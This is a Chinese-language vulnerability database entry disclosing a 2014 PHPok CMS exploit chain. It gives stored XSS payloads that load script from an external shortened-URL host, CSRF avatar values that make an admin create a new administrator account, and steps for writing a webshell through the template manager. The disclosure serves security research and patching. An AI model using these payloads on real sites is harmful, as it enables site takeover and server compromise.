Phpok漏洞礼包组合可shell

基本字段

漏洞编号：: SSV-94641

披露/发现时间：: 2014-09-23

提交时间：: 2014-09-23

漏洞等级：

漏洞类别：: 其他类型

影响组件：: PHPok

漏洞作者：: JJ Fly

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

http://wooyun.org/bugs/wooyun-2014-077024

漏洞详情

贡献者 Knownsec 共获得 0KB

### 简要描述： Phpok漏洞礼包，组合可shell ### 详细说明： 1.2处存储行xss 2.添加管理员帐号密码+利用点 3.后台写shell 1. 第一处我们先来注册一个帐号。 [<img src="https://images.seebug.org/upload/201409/22233205fbf9b598f3bccc2e7224289048fcce2f.png" alt="图片1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/22233205fbf9b598f3bccc2e7224289048fcce2f.png) 其中帐号这内容为 `a');document.write('<script/src=//t.cn/XXXXXXX></script>')//` 注册好之后。后台 [<img src="https://images.seebug.org/upload/201409/22233913788388ad877103716ca132a473b82392.png" alt="图片17.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/22233913788388ad877103716ca132a473b82392.png) [<img src="https://images.seebug.org/upload/201409/222332423b825e9f3751ea79c3a3955dabd61c8d.png" alt="图片3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/222332423b825e9f3751ea79c3a3955dabd61c8d.png) 需要点击才能激活xss [<img src="https://images.seebug.org/upload/201409/222332487f3786bbc664409a7fdb0aac3d622753.png" alt="图片4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/222332487f3786bbc664409a7fdb0aac3d622753.png) 第二处留言 [<img src="https://images.seebug.org/upload/201409/222333133155f37fdd1a49ba53b4ea3605355cb4.png" alt="图片5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/222333133155f37fdd1a49ba53b4ea3605355cb4.png) 留言主题 `a');document.write('<script/src=//t.cn/XXXXX></script>')//` [<img src="https://images.seebug.org/upload/201409/22233337d2cbf53e8081cf79ee3ed1de278cd06e.png" alt="图片6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/22233337d2cbf53e8081cf79ee3ed1de278cd06e.png) [<img src="https://images.seebug.org/upload/201409/2223334591acd2d3bbace3695e2a1d6d84e5ce2f.png" alt="图片7.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/2223334591acd2d3bbace3695e2a1d6d84e5ce2f.png) 同样需要点击 [<img src="https://images.seebug.org/upload/201409/222333501e96b4ffecd0d40c381b10b8ea144ff7.png" alt="图片8.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/222333501e96b4ffecd0d40c381b10b8ea144ff7.png) 2. 添加管理员帐号+利用点后台添加管理员帐号处，可以csrf。而且前台头像的地址没有进行效验。 http://localhost/index.php?c=usercp&f=info 单击修改资料然后抓包 Post的avatar值修改为 `admin.php%3Fc%3Dadmin%26f%3Dsave%26id%3D%26account%3Dwooyun%26pass%3Da123456%26email%3Da123456%26status%3D0%26if_system%3D1` 图中的值为url解码的内容 [<img src="https://images.seebug.org/upload/201409/222334303f1b905f4fe4948643e9541e15797314.png" alt="图片9.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/222334303f1b905f4fe4948643e9541e15797314.png) 然后再注册一个帐号上传头像 Post的avatar修改为 `admin.php%3Fc%3Dadmin%26f%3Dstatus%26id%3D2` 等管理员后台查看的时候会自动生成一个管理员而且状态为可用 [<img src="https://images.seebug.org/upload/201409/22233450089cdc9f64e5b968b3122ecf8ccb437b.png" alt="图片10.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/22233450089cdc9f64e5b968b3122ecf8ccb437b.png) 然后可以在后台登录 3. 通过前两部可以进入后台然后后台写shell 后台风格管理然后添加风格 [<img src="https://images.seebug.org/upload/201409/22233514504794e051530cc3a42b88ef79b45e71.png" alt="图片11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/22233514504794e051530cc3a42b88ef79b45e71.png) 这个地方要注意。文件夹只能是系统存在的文件夹，要不会失败的。所以写系统默认存在的www文件夹就行。 [<img src="https://images.seebug.org/upload/201409/22233544e96e26a62555030ce886d05cd5bc34c2.png" alt="图片12.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/22233544e96e26a62555030ce886d05cd5bc34c2.png) [<img src="https://images.seebug.org/upload/201409/222335508814488d2e2aa99d9d8dc5c71a0c9db3.png" alt="图片13.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/222335508814488d2e2aa99d9d8dc5c71a0c9db3.png) [<img src="https://images.seebug.org/upload/201409/2223355636678c8169a924a65549c97321e156a5.png" alt="图片14.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/2223355636678c8169a924a65549c97321e156a5.png) 直接写shell /tpl/www/111.php 代码如下 [<img src="https://images.seebug.org/upload/201409/22233615be5d377bb9969098413e2a2676bf7e2d.png" alt="图片15.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/22233615be5d377bb9969098413e2a2676bf7e2d.png) ### 漏洞证明： /tpl/www/111.php 代码如下 [<img src="https://images.seebug.org/upload/201409/22233615be5d377bb9969098413e2a2676bf7e2d.png" alt="图片15.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/22233615be5d377bb9969098413e2a2676bf7e2d.png)

共 0 兑换了

PoC

暂无 PoC

参考链接

http://wooyun.org/bugs/wooyun-2014-077024

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

Phpok漏洞礼包组合可shell

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定